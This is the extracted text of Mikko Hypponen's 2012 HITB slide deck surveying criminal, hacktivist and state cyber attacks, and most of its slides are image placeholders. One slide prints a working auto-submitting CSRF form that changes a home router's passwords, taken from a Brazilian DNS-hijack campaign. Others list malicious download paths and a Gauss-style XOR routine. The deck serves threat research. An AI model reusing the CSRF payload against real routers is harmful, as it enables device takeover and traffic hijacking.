Download - Mikko Hypponen - Behind Enemy Lines.pdf
![Page 1: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/1.jpg)
HitbSecConfKL 2012
Mikko Hypponen
CRO
F-Secure twitter.com/mikko
![Page 2: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/2.jpg)
• 11 October, 2012
![Page 3: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/3.jpg)
![Page 4: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/4.jpg)
• 11 October, 2012
![Page 5: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/5.jpg)
The Three Main Sources of Cyber Attacks
Criminals Hactivists Governments
![Page 6: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/6.jpg)
Protecting the irreplaceable | f-secure.com
Criminals
![Page 7: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/7.jpg)
Matjaz skorjanc
![Page 8: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/8.jpg)
![Page 9: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/9.jpg)
![Page 10: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/10.jpg)
![Page 11: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/11.jpg)
![Page 12: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/12.jpg)
![Page 13: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/13.jpg)
![Page 14: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/14.jpg)
![Page 15: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/15.jpg)
"Dedicated servers in data
center in Syria for ANY
projects"
"Mass domain registration
service. Buy 5 – 10 – 15
domains instantly. For
malware, traffic and the other
things"
![Page 16: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/16.jpg)
![Page 17: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/17.jpg)
![Page 18: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/18.jpg)
map.honeynet.org
![Page 19: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/19.jpg)
Sality
Sipscan
![Page 20: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/20.jpg)
Zeroaccess KML
file available from
F-Secure Weblog
![Page 21: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/21.jpg)
![Page 22: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/22.jpg)
Case cg4ng3dn5
• 4 million home DSL routers in Braz il
• Huawei, ZyXel, D-Link, Linksys, Netgear…
• Cross Site Request Forgery (CSRF) to be performed in the administration panel of the ADSL modem
• Changing the DNS servers to malicious ones
• Some Brazilian ISPs had more than 50% of users affected
![Page 23: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/23.jpg)
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
<input type="hidden" name="sptPassword" value="cg4ng3dn5">
<input type="hidden" name="usrPassword" value="cg4ng3dn5">
<input type="hidden" name="sysPassword" value="cg4ng3dn5">
</form>
</body>
![Page 24: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/24.jpg)
![Page 25: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/25.jpg)
Image from
Securelist.
![Page 26: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/26.jpg)
• google.com/GoogleDefence.exe
• facebook.com/ChromeSetup.exe
• facebook.com/Activex_Components.exe
• msn.com/ChromeSetup.exe
![Page 27: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/27.jpg)
![Page 28: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/28.jpg)
![Page 29: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/29.jpg)
Protecting the irreplaceable | f-secure.com
Hactivists
![Page 30: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/30.jpg)
![Page 31: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/31.jpg)
![Page 32: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/32.jpg)
Protecting the irreplaceable | f-secure.com
GeoHot / George Hotz
Comex / Nicholas Allegra
![Page 33: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/33.jpg)
![Page 34: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/34.jpg)
Protecting the irreplaceable | f-secure.com
Governmental attacks
![Page 35: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/35.jpg)
![Page 36: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/36.jpg)
![Page 37: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/37.jpg)
![Page 38: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/38.jpg)
Protecting the irreplaceable | f-secure.com
![Page 39: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/39.jpg)
Nuclear physics lost it's innocence in 1945
![Page 40: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/40.jpg)
6es7-315-2 / 6es7-417
Computer science lost it's innocence in 2009
![Page 41: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/41.jpg)
![Page 42: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/42.jpg)
![Page 43: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/43.jpg)
![Page 44: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/44.jpg)
![Page 45: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/45.jpg)
![Page 46: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/46.jpg)
![Page 47: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/47.jpg)
Gauss encryption mov ecx, (LENGTHOF tToCrypt)-1
mov edx, OFFSET tToCrypt
mov ebx, OFFSET tEncrypt
L1:
mov eax, [edx]
XOR eax, ACDCh
not eax
mov [ebx], eax
inc edx
inc EBX
LOOP L1
mov edx, OFFSET tOutEncr
call WriteString
mov edx, OFFSET tEncrypt
call WriteString
call Crlf
ret
![Page 48: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/48.jpg)
Protecting the irreplaceable | f-secure.com
![Page 49: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/49.jpg)
Protecting the irreplaceable | f-secure.com
![Page 50: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/50.jpg)
HitbSecConfKL 2012
Mikko Hypponen
CRO
F-Secure twitter.com/mikko